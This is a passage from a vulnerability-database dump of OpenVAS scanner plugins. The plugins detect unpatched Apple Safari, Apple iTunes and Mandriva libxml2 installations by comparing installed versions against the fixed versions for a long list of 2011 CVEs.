\"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4808\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2011/Jul/msg00002.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions prior to 5.0.6/5.1.\");\n\n script_tag(name:\"insight\", value:\"Please see the references for more details about the vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari version 5.0.6/5.1 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/MacOSX/Version\");\nif(!safVer)\n exit(0);\n\nif(version_is_less(version:safVer, test_version:\"5.0.6\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-04T14:19:46", "bulletinFamily": "scanner", "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "modified": "2017-08-30T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902543", "id": "OPENVAS:902543", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 7024 2017-08-30 11:51:43Z teissa $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(902543);\n script_version(\"$Revision: 7024 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-30 13:51:43 +0200 (Wed, 30 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.1 (5.34.50.0)\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:27:54", "bulletinFamily": "scanner", "description": "This host is installed with Apple iTunes and is prone to multiple\n vulnerabilities.", "modified": "2017-12-19T00:00:00", "published": "2011-10-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802193", "id": "OPENVAS:802193", "title": "Apple iTunes Multiple Vulnerabilities - Oct 11", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_itunes_mult_vuln_oct11_win.nasl 8169 2017-12-19 08:42:31Z cfischer $\n#\n# Apple iTunes Multiple Vulnerabilities - Oct 11\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code in\n the context of the user running the affected application. Failed attacks may\n cause denial of service conditions.\n Impact Level: System/Application\";\ntag_affected = \"Apple iTunes version prior to 10.5 (10.5.0.142) on Windows\";\ntag_insight = \"For more details about the vulnerabilities refer to the links given below.\";\ntag_solution = \"Upgrade to Apple Apple iTunes version 10.5 or later,\n For updates refer to http://www.apple.com/itunes/download/\";\ntag_summary = \"This host is installed with Apple iTunes and is prone to multiple\n vulnerabilities.\";\n\nif(description)\n{\n script_id(802193);\n script_version(\"$Revision: 8169 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 09:42:31 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-20 08:43:23 +0200 (Thu, 20 Oct 2011)\");\n script_cve_id(\"CVE-2011-0259\", \"CVE-2011-0200\", \"CVE-2011-3252\", \"CVE-2011-3219\",\n \"CVE-2011-0204\", \"CVE-2011-0215\", \"CVE-2010-1823\", \"CVE-2011-0164\",\n \"CVE-2011-0218\", \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\",\n \"CVE-2011-0225\", \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\",\n \"CVE-2011-0235\", \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\",\n \"CVE-2011-0253\", \"CVE-2011-0254\", \"CVE-2011-0255\", \"CVE-2011-0981\",\n \"CVE-2011-0983\", \"CVE-2011-1109\", \"CVE-2011-1114\", \"CVE-2011-1115\",\n \"CVE-2011-1117\", \"CVE-2011-1121\", \"CVE-2011-1188\", \"CVE-2011-1203\",\n \"CVE-2011-1204\", \"CVE-2011-1288\", \"CVE-2011-1293\", \"CVE-2011-1296\",\n \"CVE-2011-1440\", \"CVE-2011-1449\", \"CVE-2011-1451\", \"CVE-2011-1453\",\n \"CVE-2011-1457\", \"CVE-2011-1462\", \"CVE-2011-1797\", \"CVE-2011-2338\",\n \"CVE-2011-2339\", \"CVE-2011-2341\", \"CVE-2011-2351\", \"CVE-2011-2352\",\n \"CVE-2011-2354\", \"CVE-2011-2356\", \"CVE-2011-2359\", \"CVE-2011-2788\",\n \"CVE-2011-2790\", \"CVE-2011-2792\", \"CVE-2011-2797\", \"CVE-2011-2799\",\n \"CVE-2011-2809\", \"CVE-2011-2811\", \"CVE-2011-2813\", \"CVE-2011-2814\",\n \"CVE-2011-2815\", \"CVE-2011-2816\", \"CVE-2011-2817\", \"CVE-2011-2818\",\n \"CVE-2011-2820\", \"CVE-2011-2823\", \"CVE-2011-2827\", \"CVE-2011-2831\",\n \"CVE-2011-3232\", \"CVE-2011-3233\", \"CVE-2011-3234\", \"CVE-2011-3235\",\n \"CVE-2011-3236\", \"CVE-2011-3237\", \"CVE-2011-3238\", \"CVE-2011-3239\",\n \"CVE-2011-3241\", \"CVE-2011-3244\", \"CVE-2011-1774\");\n script_bugtraq_id(50067, 48416, 50065, 50068, 48437, 48825, 43228, 46703,\n 48842, 48843, 48844, 48820, 48845, 48846, 48847, 48823,\n 48848, 48849, 48850, 48827, 48851, 48852, 48853, 46262,\n 46614, 46785, 48854, 48824, 47604, 48855, 48856, 48857,\n 48858, 51032, 48479, 48960, 49279, 49850, 49658, 50066,\n 48840, 47029);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple iTunes Multiple Vulnerabilities - Oct 11\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4981\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/Security-announce/2011//Oct/msg00000.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n## Apple iTunes version < 10.5 (10.5.0.142)\nif( version_is_less( version:vers, test_version:\"10.5.0.142\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"10.5.0.142\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:04", "bulletinFamily": "scanner", "description": "This host is installed with Apple iTunes and is prone to multiple\n vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2011-10-20T00:00:00", "id": "OPENVAS:1361412562310802193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802193", "title": "Apple iTunes Multiple Vulnerabilities - Oct 11", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Multiple Vulnerabilities - Oct 11\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802193\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-10-20 08:43:23 +0200 (Thu, 20 Oct 2011)\");\n script_cve_id(\"CVE-2011-0259\", \"CVE-2011-0200\", \"CVE-2011-3252\", \"CVE-2011-3219\",\n \"CVE-2011-0204\", \"CVE-2011-0215\", \"CVE-2010-1823\", \"CVE-2011-0164\",\n \"CVE-2011-0218\", \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\",\n \"CVE-2011-0225\", \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\",\n \"CVE-2011-0235\", \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\",\n \"CVE-2011-0253\", \"CVE-2011-0254\", \"CVE-2011-0255\", \"CVE-2011-0981\",\n \"CVE-2011-0983\", \"CVE-2011-1109\", \"CVE-2011-1114\", \"CVE-2011-1115\",\n \"CVE-2011-1117\", \"CVE-2011-1121\", \"CVE-2011-1188\", \"CVE-2011-1203\",\n \"CVE-2011-1204\", \"CVE-2011-1288\", \"CVE-2011-1293\", \"CVE-2011-1296\",\n \"CVE-2011-1440\", \"CVE-2011-1449\", \"CVE-2011-1451\", \"CVE-2011-1453\",\n \"CVE-2011-1457\", \"CVE-2011-1462\", \"CVE-2011-1797\", \"CVE-2011-2338\",\n \"CVE-2011-2339\", \"CVE-2011-2341\", \"CVE-2011-2351\", \"CVE-2011-2352\",\n \"CVE-2011-2354\", \"CVE-2011-2356\", \"CVE-2011-2359\", \"CVE-2011-2788\",\n \"CVE-2011-2790\", \"CVE-2011-2792\", \"CVE-2011-2797\", \"CVE-2011-2799\",\n \"CVE-2011-2809\", \"CVE-2011-2811\", \"CVE-2011-2813\", \"CVE-2011-2814\",\n \"CVE-2011-2815\", \"CVE-2011-2816\", \"CVE-2011-2817\", \"CVE-2011-2818\",\n \"CVE-2011-2820\", \"CVE-2011-2823\", \"CVE-2011-2827\", \"CVE-2011-2831\",\n \"CVE-2011-3232\", \"CVE-2011-3233\", \"CVE-2011-3234\", \"CVE-2011-3235\",\n \"CVE-2011-3236\", \"CVE-2011-3237\", \"CVE-2011-3238\", \"CVE-2011-3239\",\n \"CVE-2011-3241\", \"CVE-2011-3244\", \"CVE-2011-1774\");\n script_bugtraq_id(50067, 48416, 50065, 50068, 48437, 48825, 43228, 46703,\n 48842, 48843, 48844, 48820, 48845, 48846, 48847, 48823,\n 48848, 48849, 48850, 48827, 48851, 48852, 48853, 46262,\n 46614, 46785, 48854, 48824, 47604, 48855, 48856, 48857,\n 48858, 51032, 48479, 48960, 49279, 49850, 49658, 50066,\n 48840, 47029);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple iTunes Multiple Vulnerabilities - Oct 11\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4981\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/Security-announce/2011//Oct/msg00000.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code in\n the context of the user running the affected application. Failed attacks may\n cause denial of service conditions.\");\n script_tag(name:\"affected\", value:\"Apple iTunes version prior to 10.5 (10.5.0.142) on Windows\");\n script_tag(name:\"insight\", value:\"For more details about the vulnerabilities refer to the links given below.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apple Apple iTunes version 10.5 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes and is prone to multiple\n vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.apple.com/itunes/download/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\n## Apple iTunes version < 10.5 (10.5.0.142)\nif( version_is_less( version:vers, test_version:\"10.5.0.142\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"10.5.0.142\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:20", "bulletinFamily": "scanner", "description": "Check for the Version of libxml2", "modified": "2017-07-06T00:00:00", "published": "2011-12-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=831506", "id": "OPENVAS:831506", "title": "Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been discovered and corrected in libxml2\n Off-by-one error in libxml allows remote attackers to execute arbitrary\n code or cause a denial of service (heap-based buffer overflow and\n application crash) via a crafted web site CVE-2011-0216).\n\n libxml2 allows remote attackers to cause a denial of service\n (out-of-bounds read) via unspecified vectors (CVE-2011-3905).\n\n The updated packages have been patched to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"libxml2 on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-12/msg00013.php\");\n script_id(831506);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-16 11:12:39 +0530 (Fri, 16 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2011:188\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-3905\");\n script_name(\"Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)\");\n\n script_summary(\"Check for the Version of libxml2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2_2\", rpm:\"libxml2_2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-utils\", rpm:\"libxml2-utils~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2_2\", rpm:\"lib64xml2_2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2-devel\", rpm:\"lib64xml2-devel~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2_2\", rpm:\"libxml2_2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-utils\", rpm:\"libxml2-utils~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2_2\", rpm:\"lib64xml2_2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2-devel\", rpm:\"lib64xml2-devel~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2011-12-16T00:00:00", "id": "OPENVAS:1361412562310831506", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831506", "title": "Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-12/msg00013.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831506\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-16 11:12:39 +0530 (Fri, 16 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"MDVSA\", value:\"2011:188\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-3905\");\n script_name(\"Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1)\");\n script_tag(name:\"affected\", value:\"libxml2 on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been discovered and corrected in libxml2\n Off-by-one error in libxml allows remote attackers to execute arbitrary\n code or cause a denial of service (heap-based buffer overflow and\n application crash) via a crafted web site CVE-2011-0216).\n\n libxml2 allows remote attackers to cause a denial of service\n (out-of-bounds read) via unspecified vectors (CVE-2011-3905).\n\n The updated packages have been patched to correct these issues.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2_2\", rpm:\"libxml2_2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-utils\", 